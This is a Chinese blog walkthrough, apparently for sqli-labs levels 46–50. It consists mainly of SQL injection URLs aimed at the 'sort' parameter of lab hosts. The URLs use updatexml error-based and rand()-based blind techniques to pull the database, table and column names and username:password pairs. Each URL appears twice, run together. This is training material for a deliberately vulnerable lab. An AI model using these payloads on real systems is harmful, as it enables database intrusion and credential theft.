sql-labs46-50通关攻略

一身傲骨@2024-08-30 14:39

第46关

一.查询数据库

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

二.查表

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查user表里数据

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+#substring

第47关

一.查询数据库

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

二.查表

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查询user表中数据

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+

第48关

使用布尔盲注

一.查询数据库长度

http://127.0.0.1/Less-48/?sort=rand(length(database())=8)http://127.0.0.1/Less-48/?sort=rand(length(database())=8)

数据库长度为8

二.查询数据库命第一个字符

http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)

ascii码 为101第一个字符为s

........接着往后查回查出数据库为'security'

三.查表格个数

http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)

说明数据库里有四个表格

四.第一个表格的名称的首字母

http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)

说明第一个表的字符为e

后面数据查询,同上

第49关

同48关

区别:字符型,需要用 ' 闭合

第50关

一.查询数据库

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

二.查表

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)

三.查列

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)

四.查询user表中数据

http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)

相关推荐
Nandeska1 分钟前
15、基于MySQL的组复制
数据库·mysql
AllData公司负责人43 分钟前
AllData数据中台-数据同步平台【Seatunnel-Web】整库同步MySQL同步Doris能力演示
大数据·数据库·mysql·开源
加油,小猿猿1 小时前
Java开发日志-双数据库事务问题
java·开发语言·数据库
山岚的运维笔记1 小时前
SQL Server笔记 -- 第20章:TRY/CATCH
java·数据库·笔记·sql·microsoft·sqlserver
Gain_chance1 小时前
33-学习笔记尚硅谷数仓搭建-DWS层交易域用户粒度订单表分析及设计代码
数据库·数据仓库·hive·笔记·学习·datagrip
未来之窗软件服务2 小时前
计算机等级考试—高频英语词汇—东方仙盟练气期
数据库·计算机软考·东方仙盟
lekami_兰2 小时前
MySQL 长事务:藏在业务里的性能 “隐形杀手”
数据库·mysql·go·长事务
JQLvopkk2 小时前
C# 轻量级工业温湿度监控系统(含数据库与源码)
开发语言·数据库·c#
devmoon3 小时前
在 Polkadot Runtime 中添加多个 Pallet 实例实战指南
java·开发语言·数据库·web3·区块链·波卡
认真的薛薛4 小时前
数据库-sql语句
数据库·sql·oracle
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03OpenClaw Chrome扩展使用教程 - 浏览器中继控制04Linux下V2Ray安装配置指南05UV安装并设置国内源06openclaw配置教程(linux+局域网ollama)07使用 1panel面板 部署 php网站08Vue-skills的中文文档09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10从零搭建一个 PHP 登录注册系统(含完整源码)